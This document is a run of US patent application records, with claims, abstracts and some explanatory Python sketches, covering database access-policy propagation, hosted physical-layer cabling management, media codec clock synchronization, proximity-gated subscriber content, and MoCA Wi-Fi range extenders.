a tap that executes in hardware in association with a database server, the database server being one of a set of database servers that share an access policy; a collector that executes in hardware in association with one or more taps, the collector being configured to receive from a tap at a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers, and to analyze the response against the access policy; and a manager that executes in hardware in association with one or more collectors, the manager being configured to automatically generate a new access policy upon a determination that the response includes a violation of the access policy, and to propagate the new access policy to one or more other database servers in the set for instantiation on the one or more other database servers; wherein the access policy violation-to-new access policy generation and propagation occurs in real-time to immunize the one or more other database servers in the set against one or more additional database access requests originated by the client. | 2,400 |
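Claim 22 above splits the mechanism into three roles: a tap at each database server that forwards a copy of each request/response pair, a collector that analyzes the response against the shared access policy, and a central manager that generates and propagates the new policy. The sketch below illustrates that division of labor under assumed names; the `observe`/`analyze`/`on_violation` interfaces and the substring-based violation check are illustrative assumptions, not the patent's design.

```python
# Illustrative tap -> collector -> manager pipeline. The manager propagates
# the new access policy only to the *other* servers in the fleet, immunizing
# them against the client whose request produced the violation.

class Tap:
    """Runs alongside one database server; forwards a copy of the traffic."""
    def __init__(self, collector, server_id):
        self.collector = collector
        self.server_id = server_id

    def observe(self, client_id, request, response):
        self.collector.analyze(self.server_id, client_id, request, response)


class Collector:
    """Analyzes served responses against the shared access policy."""
    def __init__(self, manager, forbidden):
        self.manager = manager
        self.forbidden = forbidden  # extrusion-rule values

    def analyze(self, server_id, client_id, request, response):
        if any(value in response for value in self.forbidden):
            self.manager.on_violation(server_id, client_id)


class Manager:
    """Generates the new access policy and propagates it across the fleet."""
    def __init__(self, fleet):
        self.fleet = fleet  # server_id -> set of blocked clients

    def on_violation(self, origin_server_id, client_id):
        # The new policy identifies the client to the other servers.
        for server_id, blocked in self.fleet.items():
            if server_id != origin_server_id:
                blocked.add(client_id)


fleet = {"db1": set(), "db2": set(), "db3": set()}
manager = Manager(fleet)
collector = Collector(manager, forbidden={"TOP-SECRET"})
tap = Tap(collector, "db1")
tap.observe("client-9", "SELECT * FROM docs", "doc: TOP-SECRET payload")
```

Because the tap only forwards copies, the analysis path sits out of band; only the policy instantiation touches the other servers.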
9,122 | 9,122 | 16,141,784 | 2,411 | One embodiment is directed to a heterogeneous physical layer management system comprising first devices, each comprising first physical layer information acquisition technology to obtain physical layer information about cabling attached to the first devices. The system further comprises second devices, each comprising second physical layer information acquisition technology to obtain physical layer information about cabling attached to the second devices, wherein the second physical layer information acquisition technology differs from the first physical layer information acquisition technology. The system further comprises a common management application communicatively coupled to the first devices and the second devices, wherein the common management application is configured to aggregate physical layer information from the first devices and the second devices. Another embodiment is directed to providing a physical layer management application as a service hosted by a third party. Other embodiments are disclosed. | 1. A method comprising:
acquiring, using one or more physical layer information acquisition technologies, physical layer information related to cabling attached to managed devices of a plurality of networks, each of the networks operated by a different enterprise; and aggregating, with one or more server computers operated by a third party, the physical layer information related to cabling attached to managed devices of each of the plurality of networks by the third party as a hosted service. 2. The method of claim 1, wherein aggregating physical layer information related to cabling attached to managed devices of each of the plurality of networks by the third party as a hosted service comprises:
maintaining, by the third party, a respective one or more virtual server instances for each of the plurality of networks; and for each of the plurality of networks, aggregating physical layer information related to cabling attached to managed devices of that network using the one or more virtual server instances associated with that network. 3. The method of claim 1, wherein aggregating physical layer information related to cabling attached to managed devices of each of the plurality of networks by the third party comprises load balancing, across a plurality of server resources, processing associated with aggregating physical layer information related to cabling attached to managed devices of each of the plurality of networks. 4. The method of claim 1, further comprising:
running, for each of the plurality of networks, a respective one or more local agents within the network that communicates physical layer information acquired for the network to the third party. 5. The method of claim 4, further comprising, for each of the plurality of networks, using a respective one or more HTTP sessions that are initiated by the respective local agents running within the network. 6. The method of claim 1, wherein, for at least one network, the one or more physical layer information acquisition technologies include at least one of EEPROM-based technology, RFID technology, ninth wire technology, or inference-based technology. 7. The method of claim 1, further comprising, for at least one network, acquiring physical layer information related to unmanaged devices. 8. The method of claim 1, wherein the one or more physical layer information acquisition technologies includes a first physical layer information acquisition technology and a second physical layer information acquisition technology, wherein the second physical layer information acquisition technology differs from the first physical layer information acquisition technology. 9. A server system comprising:
one or more server computers operated by a third party; wherein the one or more server computers are configured to aggregate physical layer information related to cabling attached to managed devices of each of a plurality of networks as a hosted service, wherein each of the plurality of networks is operated by a different enterprise, wherein the physical layer information is acquired using one or more physical layer information acquisition technologies. 10. The server system of claim 9, wherein the one or more server computers are further configured to aggregate physical layer information about unmanaged devices. 11. The server system of claim 9, wherein the one or more server computers are configured to aggregate physical layer information obtained by managed devices in the plurality of networks. 12. The server system of claim 9, wherein the one or more server computers are configured to:
maintain a respective one or more virtual server instances for each of the plurality of networks; and for each respective network of the plurality of networks, aggregate physical layer information for the respective network using the one or more virtual server instances associated with the respective network. 13. The server system of claim 9, wherein the one or more server computers are configured to load balance, across a plurality of server resources, processing associated with aggregating physical layer information about each of the plurality of networks. 14. The server system of claim 9, wherein the one or more server computers are configured to run, for each of the plurality of networks, a respective one or more local agents within the network that communicates physical layer information acquired for the network to the third party. 15. The server system of claim 14, wherein the respective one or more local agents within the network are configured to implement a gateway between the managed devices of the network and a hosted management application deployed on the one or more server computers. 16. The server system of claim 15, wherein the gateway is configured to appear and function as a locally deployed management application in the network to the managed devices of the network. 17. The server system of claim 14, wherein the respective one or more local agents within the network are configured to implement a gateway between other entities and a hosted management application deployed on the one or more server computers. 18. The server system of claim 14, wherein the one or more server computers are configured to, for each of the plurality of networks, use a respective one or more HTTP sessions that are initiated by the respective local agents running within the network. 19. 
The server system of claim 9, wherein the physical layer information about at least one network of the plurality of networks is acquired using one or more of an EEPROM-based technology, a RFID technology, ninth wire technology, and inference-based technology. 20. The server system of claim 9, wherein the one or more physical layer information acquisition technologies includes a first physical layer information acquisition technology and a second physical layer information acquisition technology, wherein the second physical layer information acquisition technology differs from the first physical layer information acquisition technology. | One embodiment is directed to a heterogeneous physical layer management system comprising first devices, each comprising first physical layer information acquisition technology to obtain physical layer information about cabling attached to the first devices. The system further comprises second devices, each comprising second physical layer information acquisition technology to obtain physical layer information about cabling attached to the second devices, wherein the second physical layer information acquisition technology differs from the first physical layer information acquisition technology. The system further comprises a common management application communicatively coupled to the first devices and the second devices, wherein the common management application is configured to aggregate physical layer information from the first devices and the second devices. Another embodiment is directed to providing a physical layer management application as a service hosted by a third party. Other embodiments are disclosed.1. A method comprising:
acquiring, using one or more physical layer information acquisition technologies, physical layer information related to cabling attached to managed devices of a plurality of networks, each of the networks operated by a different enterprise; and aggregating, with one or more server computers operated by a third party, the physical layer information related to cabling attached to managed devices of each of the plurality of networks by the third party as a hosted service. 2. The method of claim 1, wherein aggregating physical layer information related to cabling attached to managed devices of each of the plurality of networks by the third party as a hosted service comprises:
maintaining, by the third party, a respective one or more virtual server instances for each of the plurality of networks; and for each of the plurality of networks, aggregating physical layer information related to cabling attached to managed devices of that network using the one or more virtual server instances associated with that network. 3. The method of claim 1, wherein aggregating physical layer information related to cabling attached to managed devices of each of the plurality of networks by the third party comprises load balancing, across a plurality of server resources, processing associated with aggregating physical layer information related to cabling attached to managed devices of each of the plurality of networks. 4. The method of claim 1, further comprising:
running, for each of the plurality of networks, a respective one or more local agents within the network that communicates physical layer information acquired for the network to the third party. 5. The method of claim 4, further comprising, for each of the plurality of networks, using a respective one or more HTTP sessions that are initiated by the respective local agents running within the network. 6. The method of claim 1, wherein, for at least one network, the one or more physical layer information acquisition technologies include at least one of EEPROM-based technology, RFID technology, ninth wire technology, or inference-based technology. 7. The method of claim 1, further comprising, for at least one network, acquiring physical layer information related to unmanaged devices. 8. The method of claim 1, wherein the one or more physical layer information acquisition technologies includes a first physical layer information acquisition technology and a second physical layer information acquisition technology, wherein the second physical layer information acquisition technology differs from the first physical layer information acquisition technology. 9. A server system comprising:
one or more server computers operated by a third party; wherein the one or more server computers are configured to aggregate physical layer information related to cabling attached to managed devices of each of a plurality of networks as a hosted service, wherein each of the plurality of networks is operated by a different enterprise, wherein the physical layer information is acquired using one or more physical layer information acquisition technologies. 10. The server system of claim 9, wherein the one or more server computers are further configured to aggregate physical layer information about unmanaged devices. 11. The server system of claim 9, wherein the one or more server computers are configured to aggregate physical layer information obtained by managed devices in the plurality of networks. 12. The server system of claim 9, wherein the one or more server computers are configured to:
maintain a respective one or more virtual server instances for each of the plurality of networks; and for each respective network of the plurality of networks, aggregate physical layer information for the respective network using the one or more virtual server instances associated with the respective network. 13. The server system of claim 9, wherein the one or more server computers are configured to load balance, across a plurality of server resources, processing associated with aggregating physical layer information about each of the plurality of networks. 14. The server system of claim 9, wherein the one or more server computers are configured to run, for each of the plurality of networks, a respective one or more local agents within the network that communicates physical layer information acquired for the network to the third party. 15. The server system of claim 14, wherein the respective one or more local agents within the network are configured to implement a gateway between the managed devices of the network and a hosted management application deployed on the one or more server computers. 16. The server system of claim 15, wherein the gateway is configured to appear and function as a locally deployed management application in the network to the managed devices of the network. 17. The server system of claim 14, wherein the respective one or more local agents within the network are configured to implement a gateway between other entities and a hosted management application deployed on the one or more server computers. 18. The server system of claim 14, wherein the one or more server computers are configured to, for each of the plurality of networks, use a respective one or more HTTP sessions that are initiated by the respective local agents running within the network. 19. 
The server system of claim 9, wherein the physical layer information about at least one network of the plurality of networks is acquired using one or more of an EEPROM-based technology, a RFID technology, ninth wire technology, and inference-based technology. 20. The server system of claim 9, wherein the one or more physical layer information acquisition technologies includes a first physical layer information acquisition technology and a second physical layer information acquisition technology, wherein the second physical layer information acquisition technology differs from the first physical layer information acquisition technology. | 2,400 |
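The hosted-service arrangement recited in the claims above — a local agent running inside each enterprise network that initiates sessions toward a third-party server, which aggregates physical layer information per network — can be sketched as below. The field names, the in-memory "server", and the agent interface are illustrative assumptions, not part of the claims; in practice the agent would initiate HTTP sessions as claim 18 recites.

```python
# Sketch of the hosted-service model: each enterprise network runs a
# local agent that pushes physical layer information (cabling attached
# to managed devices) to a third-party aggregator. Names and record
# fields are illustrative assumptions.

class HostedAggregator:
    """Third-party server aggregating physical layer info per network."""
    def __init__(self):
        self.by_network = {}

    def receive(self, network_id, record):
        # Records may be acquired by any of the claimed technologies
        # (EEPROM-based, RFID, ninth wire, inference-based); they are
        # aggregated under the originating enterprise network.
        self.by_network.setdefault(network_id, []).append(record)

def local_agent_report(network_id, cabling_records, server):
    # The agent initiates the session (an HTTP POST in practice), so no
    # inbound connection into the enterprise network is required.
    for record in cabling_records:
        server.receive(network_id, record)

server = HostedAggregator()
local_agent_report("enterprise-a",
                   [{"port": 1, "cable_id": "C-100", "tech": "RFID"}],
                   server)
local_agent_report("enterprise-b",
                   [{"port": 7, "cable_id": "C-200", "tech": "EEPROM"}],
                   server)
print(len(server.by_network))  # → 2, one aggregate per enterprise
```

Keeping a separate aggregate per network mirrors claim 12's per-network virtual server instances: each enterprise's data stays partitioned even though one third party hosts the service.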
9,123 | 9,123 | 15,284,094 | 2,477 | Embodiments disclosed herein provide systems, methods, and computer readable media for synchronizing a media codec between network elements of a media communication session. In a particular embodiment, a method provides designating a first network element to be a static-clock network element during the media communication session and designating at least a second network element to be a dynamic-clock network element during the media communication session. The method further provides determining that a difference in clock speed exists between a second clock speed for the media codec at the second network element and a first clock speed for the media codec at the first network element. Also, the method provides adjusting the second clock speed to account for the difference in clock speed. | 1. A method for synchronizing a media codec between network elements of a media communication session, the method comprising:
designating a first network element to be a static-clock network element during the media communication session; designating at least a second network element to be a dynamic-clock network element during the media communication session; determining that a difference in clock speed exists between a second clock speed for the media codec at the second network element and a first clock speed for the media codec at the first network element; and adjusting the second clock speed to account for the difference in clock speed. 2. The method of claim 1, wherein determining that the difference in clock speed exists comprises:
at the second network element, receiving a plurality of data packets for the media communication session from the first network element; calculating an average frequency in which the plurality of data packets is received; and determining that a difference in frequency exists between the average frequency and a frequency of the first clock speed. 3. The method of claim 2, wherein calculating the average frequency comprises:
using the second clock speed to maintain a counter to calculate an arrival rate of the plurality of data packets. 4. The method of claim 2, wherein adjusting the second clock speed comprises:
increasing the second clock speed when the average frequency is determined to be lower than the frequency of the first clock speed; and decreasing the second clock speed when the average frequency is determined to be higher than the frequency of the first clock speed. 5. The method of claim 2, wherein the plurality of data packets is received in the Real-time Transport Protocol (RTP). 6. The method of claim 1, wherein designating the first network element to be the static-clock network element comprises:
determining that the first clock speed comprises a most accurate clock speed relative to clock speeds of other network elements on the media communication session. 7. The method of claim 6, further comprising:
at a time after designating the first network element to be the static-clock network element, determining that the first clock speed no longer comprises the most accurate clock speed; designating the first network element as a dynamic-clock network element; and designating another network element now having the most accurate clock speed to be the static-clock network element. 8. The method of claim 1, wherein the first network element comprises a first endpoint to the media communication session and the second network element comprises a second endpoint to the media communication session. 9. The method of claim 1, further comprising:
at the second network element, receiving a clock speed indication from the first network element indicating the first clock speed. 10. The method of claim 1, wherein the first clock speed comprises a default clock speed for the media codec. 11. A network element to synchronize a media codec between network elements of a media communication session, the network element comprising:
one or more computer readable storage media; a processing system operatively coupled with the one or more computer readable storage media; and program instructions stored on the one or more computer readable storage media that, when read and executed by the processing system, direct the processing system to:
designate a first network element to be a static-clock network element during the media communication session;
designate at least a second network element to be a dynamic-clock network element during the media communication session;
determine that a difference in clock speed exists between a second clock speed for the media codec at the second network element and a first clock speed for the media codec at the first network element; and
adjust the second clock speed to account for the difference in clock speed. 12. The network element of claim 11, wherein to designate the first network element to be the static-clock network element the program instructions direct the processing system to:
determine that the first clock speed comprises a most accurate clock speed relative to clock speeds of other network elements on the media communication session. 13. The network element of claim 12, wherein the program instructions further direct the processing system to:
at a time after designating the first network element to be the static-clock network element, determine that the first clock speed no longer comprises the most accurate clock speed; designate the first network element as a dynamic-clock network element; and designate another network element now having the most accurate clock speed to be the static-clock network element. 14. The network element of claim 11, wherein the first network element comprises a first endpoint to the media communication session and the second network element comprises a second endpoint to the media communication session. 15. The network element of claim 11, wherein the program instructions further direct the processing system to:
provide the second network element with a clock speed indication from the first network element indicating the first clock speed. 16. A network element to synchronize a media codec between network elements of a media communication session, the network element comprising:
one or more computer readable storage media; a processing system operatively coupled with the one or more computer readable storage media; and program instructions stored on the one or more computer readable storage media that, when read and executed by the processing system, direct the processing system to:
designate the network element to be a dynamic-clock network element during the media communication session, wherein a first network element is designated to be a static-clock network element during the media communication session;
determine that a difference in clock speed exists between a second clock speed for the media codec at the network element and a first clock speed for the media codec at the first network element; and
adjust the second clock speed to account for the difference in clock speed. 17. The network element of claim 16, wherein to determine that the difference in clock speed exists, the program instructions direct the processing system to:
receive a plurality of data packets for the media communication session from the first network element; calculate an average frequency in which the plurality of data packets is received; and determine that a difference in frequency exists between the average frequency and a frequency of the first clock speed. 18. The network element of claim 17, wherein to calculate the average frequency, the program instructions direct the processing system to:
use the second clock speed to maintain a counter to calculate an arrival rate of the plurality of data packets. 19. The network element of claim 17, wherein to adjust the second clock speed, the program instructions direct the processing system to:
increase the second clock speed when the average frequency is determined to be lower than the frequency of the first clock speed; and decrease the second clock speed when the average frequency is determined to be higher than the frequency of the first clock speed. 20. The network element of claim 17, wherein the plurality of data packets is received in the Real-time Transport Protocol (RTP). | 2,400 |
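The drift mechanism in claims 2 through 4 of the 9,123 row — timing packet arrivals with the local (dynamic) clock, comparing the average arrival frequency against the static clock's nominal frequency, and nudging the local clock speed up or down — can be sketched numerically. The step size, the 8000 Hz codec clock (typical of a narrowband codec), and the packet timings are illustrative assumptions; the claims do not fix these values.

```python
def average_arrival_frequency(arrival_times):
    """Average packet frequency (Hz) as measured by the local clock,
    in the spirit of claim 3's counter over the plurality of packets."""
    if len(arrival_times) < 2:
        raise ValueError("need at least two packets")
    span = arrival_times[-1] - arrival_times[0]
    return (len(arrival_times) - 1) / span

def adjust_clock_speed(local_hz, avg_hz, nominal_hz, step=1.0):
    # Claim 4: increase the dynamic clock when packets appear to arrive
    # more slowly than the static clock's frequency, decrease it when
    # they appear to arrive faster.
    if avg_hz < nominal_hz:
        return local_hz + step
    if avg_hz > nominal_hz:
        return local_hz - step
    return local_hz

# Packets sent at 50 Hz by the static-clock element; the local clock
# runs fast, so the measured spacing looks like 49 Hz.
arrivals = [i / 49.0 for i in range(50)]
avg = average_arrival_frequency(arrivals)
print(round(avg))                              # → 49
print(adjust_clock_speed(8000.0, avg, 50.0))   # → 8001.0
```

The key design point in the claims is that only the dynamic-clock element adapts; the static-clock element (chosen in claim 6 as the most accurate) serves as the fixed reference, so the two codec clocks converge without a shared external time source.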
9,124 | 9,124 | 16,233,389 | 2,424 | A system is provided for allowing temporary access to subscriber content through a network appliance. The system includes a server application residing on a platform server, an appliance application residing on the network appliance, and a mobile application residing on a mobile device. The server application determines the location of each of the network appliance and the mobile device. If they are within a set distance of one another, the server application allows for the temporary access to, and display of a subscriber's content on the network appliance. The server application can transmit a code to the network appliance, which the user then inputs into the mobile device. | 1. A system for allowing the display of subscriber content, comprising:
a server application residing on a platform server; an appliance application residing on a network-enabled viewing appliance; and a mobile device application residing on a mobile device, wherein the server application determines a location of each of the network-enabled viewing appliance and the mobile device, and wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are within a set distance of each other, the server application allows for the display of subscriber content on the network-enabled viewing appliance, and wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are not within the set distance of each other, the server application does not allow for the display of subscriber content on the network-enabled viewing appliance. 2. The system of claim 1, wherein the network-enabled viewing appliance and the mobile device each have location services thereon, and wherein the server application determines a distance between the network-enabled viewing appliance and the mobile device by comparing data transmitted to the server application by the location services. 3. The system of claim 2, wherein, before the server application determines the location of each of the network-enabled viewing appliance and the mobile device, the server application transmits a first code to the appliance application. 4. The system of claim 3, wherein the first code is of a type selected from the group consisting of an alphanumeric code, an audible code, an image, and any combinations thereof. 5. The system of claim 3, wherein the server application compares a second code transmitted to the server application by the mobile device application to the first code that the server application transmits to the appliance application. 6. 
The system of claim 5, wherein, if the server application determines that the first code matches the second code, the server application then determines the location of each of the network-enabled viewing appliance and the mobile device. 7. The system of claim 1, wherein the server application allows for the display of subscriber content on the network-enabled viewing appliance by transmitting data relating to the subscriber content to the network-enabled viewing appliance, and for storing the data on the network-enabled viewing appliance. 8. The system of claim 1, wherein the set distance is between zero and one hundred feet. 9. The system of claim 1, wherein the set distance is between zero and twenty feet. 10. The system of claim 1, wherein the server application queries the appliance application and the mobile device application periodically to determine whether the network-enabled viewing appliance and the mobile device are within the set distance. 11. The system of claim 1, wherein the server application queries the appliance application and the mobile device application once every five minutes. 12. The system of claim 1, wherein, when the server application allows for the display of subscriber content on the network-enabled viewing appliance, the server application either downloads content viewing applications onto the network-enabled viewing appliance, or places prompts on the network-enabled viewing appliance that would allow for download of the content viewing applications. 13. The system of claim 1, wherein, when the server application allows for the display of subscriber content on the network-enabled viewing appliance, the server application either downloads content viewing applications onto the network-enabled viewing appliance, or places prompts on the network-enabled viewing appliance that would allow for download of the content viewing applications. 14. 
A method for allowing the display of subscriber content on a network-enabled viewing appliance that is part of a system, wherein the system comprises:
a server application residing on a platform server; an appliance application residing on the network-enabled viewing appliance; and a mobile device application residing on a mobile device, the method comprising the steps of: transmitting a first code from the server application to the appliance application, for display on the network-enabled viewing appliance; transmitting a second code from the mobile device application to the server application; comparing the first code to the second code on the server application; if the first code matches the second code, determining a location of each of the network-enabled viewing appliance and the mobile device via location services on each; determining whether the network-enabled viewing appliance and the mobile device are within a set distance of each other; wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are within the set distance of each other, allowing for the display of subscriber content on the network-enabled viewing appliance; and wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are not within the set distance of each other, not allowing for the display of subscriber content on the network-enabled viewing appliance. 15. The method of claim 14, wherein the first code is of the type selected from the group consisting of an alphanumeric code, an audible code, an image, and any combinations thereof. 16. The method of claim 14, wherein the allowing for the display of subscriber content on the network-enabled viewing appliance step comprises transmitting data relating to the subscriber content to the network-enabled viewing appliance, and storing the data on the network-enabled viewing appliance. 17. The method of claim 14, wherein the set distance is between zero and one hundred feet. 18. The method of claim 14, wherein the set distance is between zero and twenty feet. 19. 
The method of claim 14, further comprising the step of querying the appliance application and the mobile device application periodically to determine whether the network-enabled viewing appliance and the mobile device are within the set distance. 20. The system of claim 19, wherein the querying step comprises querying the appliance application and the mobile device application once every five minutes. | A system is provided for allowing temporary access to subscriber content through a network appliance. The system includes a server application residing on a platform server, an appliance application residing on the network appliance, and a mobile application residing on a mobile device. The server application determines the location of each of the network appliance and the mobile device. If they are within a set distance of one another, the server application allows for the temporary access to, and display of a subscriber's content on the network appliance. The server appliance can transmit a code to the network appliance, which the user then inputs into the mobile device.1. A system for allowing the display of subscriber content, comprising:
a server application residing on a platform server; an appliance application residing on a network-enabled viewing appliance; and a mobile device application residing on a mobile device, wherein the server application determines a location of each of the network-enabled viewing appliance and the mobile device, and wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are within a set distance of each other, the server application allows for the display of subscriber content on the network-enabled viewing appliance, and wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are not within the set distance of each other, the server application does not allow for the display of subscriber content on the network-enabled viewing appliance. 2. The system of claim 1, wherein the network-enabled viewing appliance and the mobile device each have location services thereon, and wherein the server application determines a distance between the network-enabled viewing appliance and the mobile device by comparing data transmitted to the server application by the location services. 3. The system of claim 2, wherein, before the server application determines the location of each of the network-enabled viewing appliance and the mobile device, the server application transmits a first code to the appliance application. 4. The system of claim 3, wherein the first code is of a type selected from the group consisting of an alphanumeric code, an audible code, an image, and any combinations thereof. 5. The system of claim 3, wherein the server application compares a second code transmitted to the server application by the mobile device application to the first code that the server application transmits to the appliance application. 6. 
The system of claim 5, wherein, if the server application determines that the first code matches the second code, the server application then determines the location of each of the network-enabled viewing appliance and the mobile device. 7. The system of claim 1, wherein the server application allows for the display of subscriber content on the network-enabled viewing appliance by transmitting data relating to the subscriber content to the network-enabled viewing appliance, and for storing the data on the network-enabled viewing appliance. 8. The system of claim 1, wherein the set distance is between zero and one hundred feet. 9. The system of claim 1, wherein the set distance is between zero and twenty feet. 10. The system of claim 1, wherein the server application queries the appliance application and the mobile device application periodically to determine whether the network-enabled viewing appliance and the mobile device are within the set distance. 11. The system of claim 1, wherein the server application queries the appliance application and the mobile device application once every five minutes. 12. The system of claim 1, wherein, when the server application allows for the display of subscriber content on the network-enabled viewing appliance, the server application either downloads content viewing applications onto the network-enabled viewing appliance, or places prompts on the network-enabled viewing appliance that would allow for download of the content viewing applications. 13. The system of claim 1, wherein, when the server application allows for the display of subscriber content on the network-enabled viewing appliance, the server application either downloads content viewing applications onto the network-enabled viewing appliance, or places prompts on the network-enabled viewing appliance that would allow for download of the content viewing applications. 14. 
A method for allowing the display of subscriber content on a network-enabled viewing appliance that is part of a system, wherein the system comprises:
a server application residing on a platform server; an appliance application residing on the network-enabled viewing appliance; and a mobile device application residing on a mobile device, the method comprising the steps of: transmitting a first code from the server application to the appliance application, for display on the network-enabled viewing appliance; transmitting a second code from the mobile device application to the server application; comparing the first code to the second code on the server application; if the first code matches the second code, determining a location of each of the network-enabled viewing appliance and the mobile device via location services on each; determining whether the network-enabled viewing appliance and the mobile device are within a set distance of each other; wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are within the set distance of each other, allowing for the display of subscriber content on the network-enabled viewing appliance; and wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are not within the set distance of each other, not allowing for the display of subscriber content on the network-enabled viewing appliance. 15. The method of claim 14, wherein the first code is of the type selected from the group consisting of an alphanumeric code, an audible code, an image, and any combinations thereof. 16. The method of claim 14, wherein the allowing for the display of subscriber content on the network-enabled viewing appliance step comprises transmitting data relating to the subscriber content to the network-enabled viewing appliance, and storing the data on the network-enabled viewing appliance. 17. The method of claim 14, wherein the set distance is between zero and one hundred feet. 18. The method of claim 14, wherein the set distance is between zero and twenty feet. 19. 
The method of claim 14, further comprising the step of querying the appliance application and the mobile device application periodically to determine whether the network-enabled viewing appliance and the mobile device are within the set distance. 20. The method of claim 19, wherein the querying step comprises querying the appliance application and the mobile device application once every five minutes. | 2,400 |
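The code-matching and proximity gate recited in claims 14-20 above (compare the appliance's code against the mobile device's code, then confirm the two devices are within a set distance before allowing display) can be sketched in Python. This is a minimal illustration, not the patented implementation: the function names (`allow_display`, `distance_feet`), the haversine distance formula, and the 20-foot constant (taken from claim 18's upper bound) are assumptions for the sketch.

```python
import math

MAX_DISTANCE_FEET = 20  # claim 18: set distance between zero and twenty feet

def distance_feet(lat1, lon1, lat2, lon2):
    """Great-circle (haversine) distance between two lat/lon points, in feet."""
    r_feet = 20_902_231  # mean Earth radius expressed in feet
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlmb / 2) ** 2
    return 2 * r_feet * math.asin(math.sqrt(a))

def allow_display(first_code, second_code, appliance_loc, mobile_loc):
    """Allow subscriber content only if the codes match and the devices are co-located."""
    if first_code != second_code:      # compare the first code to the second code
        return False
    d = distance_feet(*appliance_loc, *mobile_loc)
    return d <= MAX_DISTANCE_FEET      # within the set distance of each other
```

A server application could run `allow_display` on each periodic query (claim 19) and revoke playback when it returns `False`.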
9,125 | 9,125 | 12,777,008 | 2,477 | As described herein, Multimedia over Coax Alliance (MoCA) is used to connect a range extender to a base Wireless Access Point (WAP). The MoCA based range extender may be outside the wireless range of the base WAP. In an embodiment, the MoCA based range extender may be in a wireless dead zone of the WAP. The MoCA range extender may support at least the same wireless bands as that of the base WAP. The MoCA based range extender may be automatically discovered in the network and may receive the configuration without intervention. Firmware also may be upgraded from the service provider network through the WAP. The MoCA range extender and its clients may communicate with other devices in the local network as well as other devices in the Authorized Service Domain controlled by the service provider. | 1. A method of extending a wireless network through a range extender, the method comprising:
receiving at the range extender wireless configuration information from a wireless access point through a coaxial cable; detecting at least one wireless device to be connected to the wireless network; transmitting network parameters to the detected at least one wireless device; and receiving an indication that the detected at least one wireless device is connected to the wireless network. 2. The method of extending the wireless network of claim 1, further comprising automatically receiving updated configuration information from a remote location. 3. The method of extending the wireless network of claim 1, wherein the wireless configuration information includes an SSID and channel number. 4. The method of extending the wireless network of claim 1, further comprising transmitting configuration requests that include DHCP and ICMP requests. 5. The method of extending the wireless network of claim 1, wherein the transmitted network parameters include subnet mask and DNS name. 6. The method of extending the wireless network of claim 1, wherein the wireless configuration information includes at least one encryption key. 7. A method of extending a wireless network having a wireless access point at a location having coaxial cable, the method comprising:
receiving at a range extender wireless configuration information from the wireless access point through the coaxial cable; automatically connecting the range extender to the wireless access point via a coaxial cable network; detecting at least one wireless device to be connected to the wireless network; transmitting network parameters to the detected at least one wireless device; and receiving an indication that the detected at least one wireless device is connected to the wireless network. 8. The method of extending the wireless network of claim 7, further comprising automatically receiving updated configuration information from a remote location. 9. The method of extending the wireless network of claim 7, wherein the wireless configuration information includes an SSID and channel number. 10. The method of extending the wireless network of claim 7, further comprising transmitting configuration requests that include DHCP and ICMP requests. 11. The method of extending the wireless network of claim 7, wherein the transmitted network parameters include subnet mask and DNS name. 12. The method of extending the wireless network of claim 7, wherein the wireless configuration information includes at least one encryption key. 13. The method of claim 1, wherein the range extender comprises a MoCA range extender. 14. A method of extending a wireless network having a wireless access point at a location having coaxial cable, the method comprising:
receiving at a range extender wireless configuration information from the wireless access point through the coaxial cable; automatically connecting the range extender to the wireless access point via a coaxial cable network; detecting at least one wireless device to be connected to the wireless network; transmitting network parameters to the detected at least one wireless device; receiving an indication that the detected at least one wireless device is connected to the wireless network; and controlling the range extender from the wireless access point. 15. The method of extending the wireless network of claim 14, wherein the range extender and the at least one wireless device are part of an authorized service domain. 16. The method of extending the wireless network of claim 15, further comprising transmitting status of the range extender; and
based on the transmitted status, receiving updated firmware. 17. The method of claim 14, wherein the range extender comprises a MoCA range extender. 18. An apparatus comprising:
a processor; and a memory storing computer readable instructions that, when executed by said processor, cause the apparatus to perform:
receiving configuration information from the wireless access point through the coaxial cable;
automatically connecting to the wireless access point via a coaxial cable network;
detecting at least one wireless device to be connected to the wireless network; transmitting network parameters to the detected at least one wireless device;
receiving an indication that the detected at least one wireless device is connected to the wireless network; and
controlling from the wireless access point. 19. The apparatus of claim 18, wherein the apparatus comprises a range extender. 20. The apparatus of claim 19 wherein the range extender comprises a MoCA range extender. | 2,400 |
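The extension flow recited in claims 7 and 14 above (receive wireless configuration over the coaxial cable, detect a wireless client, hand it network parameters, then confirm the join) can be sketched as follows. This is a hedged illustration only: the class name `MoCARangeExtender`, the dictionary-based configuration, and the example subnet mask and DNS name are assumptions, not details from the patent.

```python
class MoCARangeExtender:
    """Toy model of a MoCA-connected range extender configured by its base WAP."""

    def __init__(self):
        self.config = None   # filled in by the WAP over the coax link
        self.clients = []    # wireless devices that have joined through this extender

    def receive_config_over_coax(self, config):
        # Wireless configuration information from the WAP through the coaxial
        # cable, e.g. SSID, channel number, encryption key (claims 9 and 12).
        self.config = config

    def detect_and_connect(self, device):
        """Transmit network parameters to a detected device and record the join."""
        if self.config is None:
            raise RuntimeError("extender not yet configured by the WAP")
        # Transmitted network parameters include subnet mask and DNS name (claim 11);
        # the concrete values here are placeholders.
        params = {"ssid": self.config["ssid"],
                  "subnet_mask": "255.255.255.0",
                  "dns_name": "dns.example.net"}
        device.update(params)
        self.clients.append(device)  # indication that the device is now connected
        return params
```

A WAP-side controller (claim 14's "controlling the range extender from the wireless access point") would drive these calls remotely rather than locally.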
